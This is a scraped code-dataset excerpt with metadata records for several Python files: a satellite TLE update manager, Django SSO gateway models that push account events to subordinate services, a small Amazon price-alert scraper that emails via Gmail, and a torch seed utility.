103, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 103, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 104, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 105, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 105, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 106, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 106, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 108, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 109, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 110, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 110, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 111, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 111, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 112, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 112, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 113, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 113, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 115, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 115, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 116, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 116, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 154, "usage_type": "attribute"}, {"api_name": "psu.PSU", "line_number": 164, "usage_type": "call"}, {"api_name": "ui.widgets.Pannel", "line_number": 167, "usage_type": "call"}, {"api_name": "ui.widgets", 
"line_number": 167, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 174, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 174, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 177, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 177, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 181, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 182, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 185, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 185, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 189, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 192, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 196, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 196, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 200, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 200, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 201, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 201, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 204, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 204, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 208, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 208, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 211, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 211, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 215, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 215, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 219, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 219, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 223, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 223, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 225, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 225, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 227, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 227, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 229, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 231, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 231, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame.time.Clock", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", 
"line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 335, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 345, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 345, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 352, "usage_type": "call"}, {"api_name": "ui.surface.TouchScreen", "line_number": 354, "usage_type": "call"}, {"api_name": "ui.surface", "line_number": 354, "usage_type": "name"}]} +{"seq_id": "16203859230", "text": "#!/usr/bin/env python3\n\n'''\ntlemanager.py\n2018-11-19\njonathanwesleystone+KI5BEX@gmail.com\n\nLoad and keep updated the local TLE database.\n'''\n\nimport json\n\nfrom datetime import datetime, timezone\n\nimport requests\n\nfrom skyfield.functions import BytesIO\nfrom skyfield.iokit import parse_tle\n\nclass TleManager:\n '''Keep the TLE files updated.\n '''\n\n def __init__(self, tlesrcfile=None, tledbcurrent=None, tledbhistory=None):\n '''load up a birdlist annotated with TLE sources\n\n :param tlesrcfile: JSON file linking the birds to their TLEs\n :param tledb: JSON file containing the downloaded TLE logs and history\n '''\n\n self.tlesrcfile = 'data/tle/choice_birds.json' if tlesrcfile is None else tlesrcfile\n self.tledbcurrent = 'tledbcurrent.json' if tledbcurrent is None else tledbcurrent\n self.tledbhistory = 'tledbhistory.json' if tledbhistory is None else tledbhistory\n\n try:\n with open(self.tlesrcfile, 'r') as fin:\n self.tlesrcs = json.load(fin)\n except FileNotFoundError:\n self.tlesrcs = {\n 'sources': []\n }\n\n self.tle = self.load()\n # this has the tle with our aliases\n self.tlestring = '\\n'.join([key + '\\n' + value.replace('n', '-') for key, value in self.tle.items()])\n self.bird = self.parse()\n\n def parse(self):\n '''Parse the loaded tle data using SkyField API.\n '''\n tle = {}\n for names, sat in parse_tle(BytesIO(bytes(self.tlestring, 'ascii'))):\n tle[sat.model.satnum] = sat\n for name in names:\n tle[name] = sat\n\n return tle\n\n def load(self):\n '''load the current tle data into a dict of {bird_alias: 'tle\\nlines'}\n '''\n\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {\n 'sources': []\n }\n\n bird_tles = {}\n for source in self.tlesrcs['sources']:\n if source in tledbcurrent:\n lines = tledbcurrent[source]['body'].splitlines()\n for birdname, bird in self.tlesrcs['birds'].items():\n if 'source' in bird and bird['source'] == source:\n lineiter = iter(lines)\n for line in lineiter:\n if bird['name'] == line.strip():\n bird_tles[birdname] = ((birdname + (' ' * 24))[:24]) + \\\n '\\n' + next(lineiter) + '\\n' + next(lineiter)\n break\n\n return bird_tles\n\n def update(self, keep_history=True):\n '''update the tles if needed\n '''\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {}\n\n try:\n with open(self.tledbhistory, 'r') as fin:\n tledbhistory = json.load(fin)\n except FileNotFoundError:\n tledbhistory = {}\n\n for source in self.tlesrcs['sources']:\n wsrc = tledbcurrent.get(source, {})\n\n headers = {}\n if 'etag' in wsrc:\n headers['etag'] = wsrc['etag']\n if 'last-modified' in wsrc:\n headers['If-Modified-Since'] = wsrc['last-modified']\n\n response = 
requests.get(self.tlesrcs['sources'][source]['url'], headers=headers)\n\n now = datetime.now(timezone.utc).astimezone().isoformat()\n\n wsrc['checked'] = now\n wsrc['status'] = response.status_code\n\n if response.status_code == 200:\n wsrc['body'] = response.text\n wsrc['updated'] = now\n\n if 'etag' in response.headers:\n wsrc['etag'] = response.headers['etag']\n if 'last-modified' in response.headers:\n wsrc['last-modified'] = response.headers['last-modified']\n\n tledbcurrent[source] = wsrc\n\n if keep_history:\n tledbhistory[source] = tledbhistory.get(source, [])\n tledbhistory[source].append({\n 'when': now,\n 'status': response.status_code,\n 'text': response.text,\n 'etag': response.headers.get('etag'),\n 'last-modified': response.headers.get('last-modified')\n })\n\n with open(self.tledbcurrent, 'w') as fout:\n json.dump(tledbcurrent, fout)\n\n if keep_history:\n with open(self.tledbhistory, 'w') as fout:\n json.dump(tledbhistory, fout)\n\n def __getitem__(self, bird):\n '''Bird fetcher -- return SkyField Satellite object parsed from the TLE identified by bird.\n '''\n return self.bird[bird]\n\nclass TestTleManager(TleManager):\n '''Test wrapper for TleManager.\n '''\n\n def __init__(self):\n '''Call super with test arguments for convenience.\n '''\n super().__init__(None, 'data/test/tledbcurrent.json', 'data/test/tledbhistory.json')\n", "repo_name": "piratejon/birdplans", "sub_path": "birdplans/tlemanager.py", "file_name": "tlemanager.py", "file_ext": "py", "file_size_in_byte": 5197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "skyfield.iokit.parse_tle", "line_number": 52, "usage_type": "call"}, {"api_name": "skyfield.functions.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 112, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 112, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 139, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "19973138297", "text": "import logging\nfrom inspect import ismethod, isfunction\nfrom typing import Union\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import QuerySet\nfrom django.db.models.base import ModelBase\nfrom django.utils.crypto import get_random_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_sso.exceptions import SSOException\nfrom django_sso.sso_gateway import Settings\n\nuser_model = get_user_model()\n\n\ndef service_token_generator():\n return get_random_string(Service.token.field.max_length)\n\n\nclass Service(models.Model):\n name = models.CharField(max_length=128, verbose_name=_('Name'))\n base_url = models.URLField(verbose_name=_('Base url'))\n enabled = 
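# Illustrative sketch, separate from the scraped birdplans record above:
# TleManager.update() caches each source's ETag and Last-Modified response headers
# and replays them on the next request so an unchanged TLE file is not re-downloaded.
# A minimal standalone version of that conditional-GET pattern, using the conventional
# If-None-Match request header for the ETag; the URL below is a placeholder.
import requests

def fetch_if_changed(url, cache):
    headers = {}
    if cache.get('etag'):
        headers['If-None-Match'] = cache['etag']
    if cache.get('last-modified'):
        headers['If-Modified-Since'] = cache['last-modified']
    response = requests.get(url, headers=headers, timeout=10)
    if response.status_code == 304:
        return cache.get('body'), False          # unchanged, reuse cached body
    response.raise_for_status()
    cache.update({
        'body': response.text,
        'etag': response.headers.get('ETag'),
        'last-modified': response.headers.get('Last-Modified'),
    })
    return cache['body'], True

# cache = {}
# body, changed = fetch_if_changed('https://example.com/tle.txt', cache)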
models.BooleanField(default=False, verbose_name=_('Enabled'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), unique=True, default=service_token_generator)\n\n def __str__(self):\n return self.base_url\n\n def _send_event(self, event_type, data):\n text = None\n fail = False\n\n if hasattr(settings, 'SSO_SUBORDINATE_COMMUNICATION_TIMEOUT'):\n timeout = settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT\n\n assert type(settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT) in (int, float)\n else:\n timeout = 0.1 # 100ms\n\n try:\n result = requests.post(\n f'{self.base_url}/sso/event/',\n json={\n 'type': event_type,\n 'token': self.token,\n **data\n },\n headers={\n \"Content-Type\": \"application/json\"\n },\n timeout=timeout\n )\n except Exception as e:\n logging.error(f\"Django SSO: {_('Failed to communicate with subordinated service')} {self.base_url}: {e}\")\n\n return\n\n try:\n assert result.status_code == 200, f\"{result.text}\"\n data = result.json()\n\n ok = not not (data['ok'] if 'ok' in data else False)\n\n if ok:\n return ok\n elif 'error' in data:\n raise Exception(f\"Django SSO: {_('Error raised on subordinate service')}: {data['error']}\")\n else:\n raise Exception(result.text)\n except Exception as e:\n logging.error(f'{_(\"Incorrect response from subordinated service\")}: STATUS={result.status_code}; TEXT={e}')\n\n return\n\n @staticmethod\n def build_update_user_event(user):\n \"\"\"\n Build event for accounts update on subbordinated services\n\n Args:\n user: AbstractBaseUser based classes are allowed\n \"\"\"\n event = {\n 'fields': {}\n }\n\n for field in ('is_active', 'is_staff', 'is_superuser'):\n if hasattr(user_model, field):\n event['fields'][field] = bool(getattr(user, field))\n\n event['fields'][\"user_identy\"] = getattr(user, user_model.USERNAME_FIELD)\n\n if hasattr(settings, 'SSO') and 'ADDITIONAL_FIELDS' in settings.SSO:\n for additional_field in settings.SSO['ADDITIONAL_FIELDS']:\n field_info = additional_field.split(':')\n alias = field_info[1] if len(field_info) == 2 else None\n\n result = user\n\n try:\n for prop in field_info[0].split('.'):\n try:\n value = getattr(result, prop)\n except ObjectDoesNotExist:\n value = None\n break\n\n if value != None:\n result = value\n else:\n result = None\n break\n\n if ismethod(result):\n result = result()\n elif isinstance(result, models.Model):\n if hasattr(result, 'to_sso_representation'):\n result = result.to_sso_representation()\n else:\n result = str(result)\n except Exception as e:\n logging.warning('Django SSO: failed to read value for field %s: %s' % (field_info[0], e))\n result = None\n\n event['fields'][alias if alias else additional_field] = result\n\n return event\n\n @staticmethod\n def build_update_fields_event(user_identities: Union[set, QuerySet], instance: ModelBase):\n \"\"\"\n Build event for fields update on subbordinated services. 
Fields of related model.\n\n Args:\n user_identities: QuerySet with users\n instance: An updated related model\n \"\"\"\n\n sso_settings = Settings()\n\n event = {\n \"fields\": {},\n \"user_identities\": (\n [*user_identities.values_list(get_user_model().USERNAME_FIELD, flat=True)]\n if isinstance(user_identities, QuerySet)\n else user_identities\n )\n }\n\n for field_info in sso_settings.affected_models_fields[instance.__class__]:\n field_info = field_info.split(':')\n field_alias = field_info[1] if len(field_info) == 2 else None\n field_path = field_info[0].split('.')\n field_name = field_alias if field_alias else field_info[0]\n\n if instance:\n if len(field_path) == 1:\n if hasattr(instance, 'to_sso_representation'):\n value = instance.to_sso_representation()\n else:\n value = str(instance)\n elif len(field_path) == 2:\n model_attr = getattr(instance, field_path[1])\n\n if model_attr is None:\n value = None\n elif ismethod(model_attr):\n value = model_attr()\n elif isinstance(model_attr, property):\n value = model_attr\n else:\n value = model_attr\n else:\n logging.error('Django SSO: Unhandled exception. Contact developer with information about it.')\n\n if type(value) not in (str, bool, float, int):\n logging.error(\n f\"Django SSO: For additional field '{field_info}' provided unsupported type {type(value)}\"\n )\n value = None\n\n event['fields'][field_name] = value\n else:\n event['fields'][field_name] = None\n\n return event\n\n def deauthenticate(self, user: Union[str, ModelBase]):\n \"\"\"\n Send deauthentication event to subordinate service, if that active\n\n Args:\n user: User model object or user identy - username field value\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event('deauthenticate', {\n 'user_identy': user if type(user) == str else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def delete_user(self, user: Union[ModelBase, str]):\n \"\"\"\n Casts user deletion event\n\n @param user: User identy string or UserModel instance\n \"\"\"\n return self._send_event('delete_user', {\n 'user_identy': user if isinstance(user, str) else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def change_user_identy(self, old, new):\n \"\"\"\n Emit event for changing user identy.\n\n In cases, when you change login|email|etc...\n\n @param old: Old user identy\n @param new: New user identy\n \"\"\"\n return self._send_event('change_user_identy', {\n 'old': old,\n 'new': new\n })\n\n def update_account(self, user) -> bool:\n \"\"\"\n Send account information to subordinated service, if subordinated service is active\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event(\n event_type='update_account',\n data=self.build_update_user_event(user)\n )\n\n def update_fields(self, to_users: Union[QuerySet, set], instance: ModelBase = None) -> bool:\n \"\"\"\n Send event with updated fields of the related model, if subordinated service is active\n \"\"\"\n if not self.enabled or not len(to_users):\n return True\n\n return self._send_event(\n event_type='update_fields',\n data=self.build_update_fields_event(to_users, instance)\n )\n\n @staticmethod\n def cast_event_to_all_services(event_name: str, **kwargs):\n assert len(event_name) and not event_name.startswith('_'), f\"Bad event name {event_name}\"\n\n if not hasattr(Service, event_name) or not isfunction(getattr(Service, event_name)):\n raise Exception(f'Django SSO: {Service.__class__.__name__} has no method {event_name}')\n\n for service in Service.objects.filter(enabled=True):\n getattr(service, 
event_name)(**kwargs)\n\n class Meta:\n verbose_name = _('Subordinated service')\n verbose_name_plural = _('Subordinated services')\n\n\ndef auth_token_generator():\n return get_random_string(AuthenticationRequest.token.field.max_length)\n\n\nclass AuthenticationRequest(models.Model):\n service: Service = models.ForeignKey('Service', on_delete=models.CASCADE, verbose_name=_('Service'))\n created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), default=auth_token_generator, unique=True)\n user_identy = models.CharField(max_length=128, verbose_name=_('User identy'), help_text=_('E-Mail, login, etc.'))\n next_url = models.CharField(max_length=512, verbose_name=_('Next url'), help_text=_('To go after success auth'))\n authenticated = models.BooleanField(default=False, verbose_name=_('Request has been activated'))\n used = models.BooleanField(default=False, verbose_name=_('Are used in external sso service'))\n\n class Meta:\n verbose_name = _('Authentication request')\n verbose_name_plural = _('Authentication requests')\n\n def activate(self, user: User):\n \"\"\"\n 1) Activate authentication request\n 2) Send base information about user to subordinated service\n \"\"\"\n self.user_identy = getattr(user, user_model.USERNAME_FIELD)\n self.authenticated = True\n self.save()\n\n try:\n return self.service.update_account(user)\n except Exception as e:\n raise SSOException(str(e))\n\n def __str__(self):\n return f'{_(\"Authenticate\")} {self.user_identy} {_(\"on\")} {self.service} {_(\"then go to\")} {self.next_url}'\n", "repo_name": "DAVIDhaker/django-sso", "sub_path": "src/django_sso/sso_gateway/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.URLField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, 
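# Illustrative sketch, separate from the scraped django-sso record above: the
# ADDITIONAL_FIELDS handling in build_update_user_event() resolves dotted attribute
# paths such as "profile.department.name" (this example path is hypothetical) against
# a user object, calling bound methods and falling back to None when a link in the
# chain is missing. A minimal standalone version of that traversal:
def resolve_dotted_path(obj, path):
    value = obj
    for attr in path.split('.'):
        value = getattr(value, attr, None)
        if value is None:
            return None
    return value() if callable(value) else value

# Example with plain objects standing in for Django model instances:
class _Dept:
    name = 'physics'

class _Profile:
    department = _Dept()

class _User:
    profile = _Profile()

assert resolve_dotted_path(_User(), 'profile.department.name') == 'physics'
assert resolve_dotted_path(_User(), 'profile.missing.name') is None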
"usage_type": "name"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.conf.settings.SSO", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 110, "usage_type": "name"}, {"api_name": "inspect.ismethod", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 128, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 136, "usage_type": "name"}, {"api_name": "django_sso.sso_gateway.Settings", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.QuerySet", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 150, "usage_type": "call"}, {"api_name": "inspect.ismethod", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 208, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 244, "usage_type": "name"}, {"api_name": "inspect.isfunction", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 267, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 268, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 272, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 275, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 275, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 276, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 
276, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 278, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 279, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 282, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 285, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 286, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 288, "usage_type": "name"}, {"api_name": "django_sso.exceptions.SSOException", "line_number": 300, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 303, "usage_type": "call"}]} +{"seq_id": "32555115650", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nURL = 'https://www.amazon.in/Apple-MacBook-16-inch-Storage-Intel-Core-i7/dp/B081JXDZFM/ref=sr_1_1_sspa?dchild=1&keywords=macbook&qid=1592241660&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE3OE9EVDNFUzlMTDImZW5jcnlwdGVkSWQ9QTAyMDEzNTkxSkhVVUdSQ0xFSTJPJmVuY3J5cHRlZEFkSWQ9QTA0ODM5NTQyM0xFRFlBTlM1V09GJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0\"}\n\n\ndef check_price():\n page = requests.get(URL, headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n\n productTitle = soup.find(id='productTitle').get_text()\n price = soup.find(id='priceblock_ourprice').get_text()\n temp = ''\n for n in price[2:-3]:\n if n != ',':\n temp += n\n productPrice = int(temp)\n\n if productPrice > 185000:\n send_email()\n\n print(productPrice)\n print(productTitle.strip())\n\n\ndef send_email():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('hraj2661999@gmail.com', 'RaNdOm_PaSsWoRd')\n\n subject = \"Price just fell down!\"\n body =\"Price just fell down!\\nCheck the link\"+URL\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n 
server.sendmail(\n 'hraj2661999@gmail.com',\n 'hraj2661999@gmail.com',\n msg\n )\n print('HEY! MAIL HAS BEEN SENT')\n\n server.quit()\n\nwhile(True):\n check_price()\n time.sleep(60*60*24)\n", "repo_name": "iamHrithikRaj/Python-App-That-Tracks-Amazon-Prices", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "74095533289", "text": "import random\nimport numpy as np\nimport torch\n\n# For reproducibility\ndef set_seed(s):\n random.seed(s)\n np.random.seed(s)\n torch.manual_seed(s)\n\n torch.cuda.manual_seed_all(s)\n #add additional seed\n torch.backends.cudnn.deterministic=True\n torch.use_deterministic_algorithms = True", "repo_name": "yaozhong/SCLSC", "sub_path": "code/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, 